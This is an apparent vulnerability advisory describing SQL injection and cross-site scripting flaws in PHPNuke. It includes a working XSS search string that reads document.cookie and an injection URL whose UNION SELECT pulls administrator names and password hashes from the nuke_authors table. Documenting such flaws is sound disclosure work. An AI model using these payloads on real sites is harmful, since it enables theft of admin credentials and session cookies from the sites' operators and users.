• info
• discussion
• exploit
• solution
• references

Multiple PHPNuke SQL Injection And Cross-Site Scripting Vulnerabilities

No exploit is required.

An example of a search request sufficient to trigger the cross-site scripting vulnerability:
1"><body onload="alert(document.cookie);

An example of the SQL injection vulnerability:
http://www.example.com/nuke73/modules.php?name=Search&type=comments&query=not123exists&instory=/**/UNION/**/SELECT/**/0,0,pwd,0,aid/**/FROM/**/nuke_authors